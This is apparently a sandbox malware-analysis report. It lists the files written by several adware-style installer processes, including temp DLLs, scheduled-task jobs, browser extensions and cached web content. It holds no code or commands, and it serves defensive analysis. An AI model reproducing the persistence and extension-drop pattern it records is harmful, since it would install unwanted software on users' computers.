C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\mipntrzne.dll (30112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\01783b5d-40d7-41d4-9ba0-a7e585dc1505-4.dll (46916 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\zwqnxb.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\rypiyr.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\31686 (91765 bytes)
%Program Files% (x86)\App Lid\Uninstall.exe (601 bytes)
%Program Files% (x86)\App Lid\01783b5d-40d7-41d4-9ba0-a7e585dc1505-5.exe (7385 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\igzjjofm.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\raqkdgbq.dll (3410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\ipgeoapi_com[1].json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\loubc.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd670C.tmp (662695 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsj672D.tmp\kbfew.dll (13 bytes)
%Program Files% (x86)\App Lid\01783b5d-40d7-41d4-9ba0-a7e585dc1505-4.exe (9147 bytes)

The process smt_istartsurf.exe:3284 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\eg1.zip (178187 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\tmp\wpm_v20.0.0.1953_0302.exe (16944 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\Thumbs.db (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\UninstallManager.exe (60186 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\Thumbs.db (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\scrollbar.bmp (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\eg2.zip (217566 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\474.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\tmp\XTab_Setup2121.exe (76650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\QQBrowser.exe (5199 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\QQBrowserFrame.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\bg.png (5064 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\DataBase (26688 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\sweetsearch!1.0.0.1031.xpi (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\tmp\474.db (168 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\quick_searchff#5.4.10.xpi (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\conf (79 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\uninstallDlg2.xml (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\xtmp569512\images\code\code5.jpg (4 bytes)

The process Mniitruxnlcp.exe:3244 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\wwrumuo.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\tyhdzuw.dll (3730 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\4594 (3389 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\rblyvufer.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp (4 bytes)
C:\Windows\Tasks\cfeca700-7b58-4ebe-8806-aa3ea96213cd-5_user.job (74 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\sfseclo.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\ghcrjjq.dll (31236 bytes)
%Program Files% (x86)\iWebar\utils.exe (80855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\installer.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\gpuiqgk.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nstCACE.tmp (596719 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\dogolylzg.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\System.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\444749 (94253 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\novufxv.dll (14 bytes)
%Program Files% (x86)\iWebar\cfeca700-7b58-4ebe-8806-aa3ea96213cd.xpi (2321 bytes)
%Program Files% (x86)\iWebar\Uninstall.exe (601 bytes)
%Program Files% (x86)\iWebar\cfeca700-7b58-4ebe-8806-aa3ea96213cd-4.exe (9654 bytes)
C:\Windows\Tasks\cfeca700-7b58-4ebe-8806-aa3ea96213cd-5.job (74 bytes)
%Program Files% (x86)\iWebar\cfeca700-7b58-4ebe-8806-aa3ea96213cd-5.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\ipgeoapi_com[1].json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCB0D.tmp\cfeca700-7b58-4ebe-8806-aa3ea96213cd-4.dll (49631 bytes)

The process XTab_Setup2121.exe:1496 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\web\img\loading.gif (5 bytes)
%Program Files% (x86)\XTab\skin\btn.png (2 bytes)
%Program Files% (x86)\XTab\install.data (68 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files% (x86)\XTab\HPNotify.exe (17941 bytes)
%Program Files% (x86)\XTab\conf (1594 bytes)
%Program Files% (x86)\XTab\web\js\library.js (4216 bytes)
%Program Files% (x86)\XTab\BrowerWatchFF.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\indexIE8.html (1794 bytes)
%Program Files% (x86)\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\ver.txt (47 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\input_bk.png (2 bytes)
%Program Files% (x86)\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\conf_back.png (1623 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files% (x86)\XTab\uninstall.exe (1343 bytes)
%Program Files% (x86)\XTab\skin\btn_apply.png (6 bytes)
%Program Files% (x86)\XTab\skin\conf.xml (8 bytes)
%Program Files% (x86)\XTab\CmdShell.exe (1685 bytes)
%Program Files% (x86)\XTab\web\indexIE.html (1 bytes)
%Program Files% (x86)\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\js\xagainit-ie8.js (4 bytes)
%Program Files% (x86)\XTab\skin\about_bk.png (1436 bytes)
%Program Files% (x86)\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\main.xml (4 bytes)
%Program Files% (x86)\XTab\web\img\icon48.png (3 bytes)
%Program Files% (x86)\XTab\BrowserAction.dll (33992 bytes)
%Program Files% (x86)\XTab\skin\radio_2.png (3 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (21280 bytes)
%Program Files% (x86)\XTab\searchProvider.xml (8 bytes)
%Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\ProtectService.exe (5309 bytes)
%Program Files% (x86)\XTab\web\js\js.js (18 bytes)
%Program Files% (x86)\XTab\ffsearch_toolbar!1.0.0.1028.xpi (15 bytes)
%Program Files% (x86)\XTab\skin\logo.png (5 bytes)
%Program Files% (x86)\XTab\web\js\xagainit2.0.js (4 bytes)
%Program Files% (x86)\XTab\web\data.html (20 bytes)
%Program Files% (x86)\XTab\web\main.css (19 bytes)
%Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\close.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst582E.tmp\System.dll (23 bytes)
%Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
%Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
%Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files% (x86)\XTab\skin\about.png (4 bytes)
%Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\img\icon16.png (628 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\settings.png (5 bytes)
%Program Files% (x86)\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files% (x86)\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files% (x86)\XTab\web\js\ga.js (1568 bytes)
%Program Files% (x86)\XTab\web\js\common.js (2 bytes)
%Program Files% (x86)\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files% (x86)\XTab\SupTab.dll (15946 bytes)
%Program Files% (x86)\XTab\IeWatchDog.dll (20 bytes)
%Program Files% (x86)\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\img\google_trends.png (7 bytes)
%Program Files% (x86)\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files% (x86)\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files% (x86)\XTab\msvcp110.dll (16990 bytes)
%Program Files% (x86)\XTab\skin\radio_1.png (3 bytes)

The process WebPlayer.exe:3488 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\da84c206c2019448521379d2ff837774[1].png (4648 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\jquery.smooth-scroll.min[1].js (194 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\analytics[1].js (16603 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\config[1].json (778 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\logo_illust[1].jpg (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\home[1].htm (2931 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\567f43cb72fe3ac6419369953394cadd[1].png (38038 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\6a12dc1a298e870b610a58a56ba0f5ec[1].jpg (584 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\7e5817bad781bbc2d2e43b350ccb53db[1].png (4648 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\7d4f668f3d1818d01b6b9684b669d0db[1].png (5680 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\cc3148e57a2928cd1ada1bbea553c3c2[1].png (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\0692c2494a7331a77c05954f79c5480a[1].png (8120 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\lightbox[1].css (426 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\7fb9f4ca0fa96299334c18ee76c7b68b[1].jpg (3380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\7c9d412c730603d1d82b98a548a71bac[1].png (8048 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\5.0stars[1].jpg (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\58d196b3e886a838d021adc8c8848f1e[1].png (1160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\442a5f30204dd385d17de5848683274f[1].png (21888 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\5dbc29649669598ff43174b9ee730008[1].png (2888 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\3d8bbea6bcae57d705c676f7050a7d51[1].png (4648 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\b85261679e262228a562f693b3e6ef6f[1].png (26370 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\52d5414e7372639389ab7e9e4d479aee[1].png (22754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\close[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\e54e8c720dffffa619c3b0eacec9381a[1].png (3040 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\ddb3b88cf98eb0220c9e6c252e376749[1].png (13400 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\lightbox[1].js (5015 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\3YEwT2a1878zysq92S8_9w[1].eot (1831 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\23428f8768d928d2bd45dd3b0c4d0057[1].png (20045 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\13a052a6d8c62b7831aa10e2f6f37454[1].jpg (576 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\00c73f6d4e4eb25289dddb86e2d1e319[1].jpg (1928 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\loading[1].gif (200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\1f8ffa22b53dfc2f6b7f1850bb6b73e8[1].png (12545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\jquery-ui.min[1].js (128104 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\d586df222f5069b6c396373d67d0163b[1].png (25089 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\3.0stars[1].jpg (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\36d7cd00f07003a67021237993257d08[1].png (9495 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\a6ae526a0a22dcfc743a66d44a3e09e3[1].png (27509 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\83a4cee7a59522b93ed0ae1fa73ce8f3[1].png (2888 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\jquery.min[1].js (49396 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\13ca8e322e15bc394d66a37bec12e3b4[1].png (27909 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\f3ad8b396434c21b4c214fd667ee391d[1].png (1928 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\product[1].css (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\589b1e936e1f038dc45bd8ffff59b359[1].png (18247 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\3.5stars[1].jpg (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\4f263f4be4c4396c9078d1874c05b928[1].png (5568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\f1ed3cd0cae7a3524376e6f9369c7ab8[1].png (6139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\a64a4b5c68c364d30083fbd0b0363585[1].png (24298 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\f4e4b853ddab3b763f0af17d513631bd[1].png (21259 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\logo[1].jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\4.0stars[1].jpg (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\b147a5a09b49b133d347bd975a4c5616[1].png (4732 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\scripts[1].js (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\style[1].css (181 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\bg_main[1].jpg (200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\59982d8527c0da41e35817e8fc15c0fc[1].png (4648 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\07fce0a4ff78cc7e6376e227f046ce06[1].png (35299 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\ace33f0a1eddf74bbe8d1bfac70deded[1].png (10360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D285HURO\4.5stars[1].jpg (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\css[1].css (155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\365640f122ef96f033f2f87c6308031e[1].png (9488 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\e94782c9200f8de809a50327879df1cc[1].png (20150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A72JYS1P.txt (226 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\ac5196fbf245580eee113296dff14d0b[1].png (8840 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\bbbde9554589bda63791709a6785e0a3[1].png (10360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IY8Z5ZY0.txt (92 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\btn_bg[1].jpg (1 bytes)

The process 7za.exe:800 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\install20087.exe (407 bytes)

The process %original file name%.exe:2684 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-H5U6C.tmp\cbead634babe14801c0b14d3517a10f8.tmp (1414 bytes)

The process appshat.exe:3704 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso648D.tmp\Mfuyqgtg.tmp (394440 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso648D.tmp\zwqnxb.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso648D.tmp\Bxaze.exe (1705164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso648D.tmp\xiwrlae.dll (2119 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nso648D.tmp\rypiyr.dll (30 bytes)

The process ins_shopperpro.exe:3608 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd8067.tmp\setup1.exe (144456 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn8056.tmp (154948 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd8067.tmp\D1958.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd8067.tmp\setup.exe (1606835 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsd8067.tmp\NK.lky (16 bytes)

The process GLB61FD.tmp:3224 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files% (x86)\YouTube Accelerator\~GLH000e.TMP (11493 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH001a.TMP (13284 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\blank.html (75 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH000d.TMP (7861 bytes)
C:\Users\"%CurrentUserName%"\Desktop\YouTube Accelerator.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VADEU.LNG (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\~GLH0006.TMP (115350 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLF6A7B.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\updater.exe (14357 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH0019.TMP (11019 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAENG.LNG (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YTAuninstall.mht (9 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH0011.TMP (34 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLJ625B.tmp (6 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH001f.TMP (2461 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLK645F.tmp (1604 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAIDN.LNG (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAPOL.LNG (1166 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAROM.LNG (19 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\sporder.Dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~GLH0001.TMP (2104 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\testlsp.exe (19739 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\YTAHelperSetup.exe (27866 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~GLH0004.TMP (16 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH0009.TMP (2104 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\xmldb.dll (3048 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH0016.TMP (6341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~GLH0003.TMP (119 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH0010.TMP (610 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\OK.gif (329 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH0008.TMP (2784 bytes)
%Program Files% (x86)\YouTube Accelerator\~GLH000c.TMP (941 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\SAINST\LocalesU\VATRK.LNG (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GLC623B.tmp (3791 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\LocalesU\VAITA.LNG (1660 bytes)
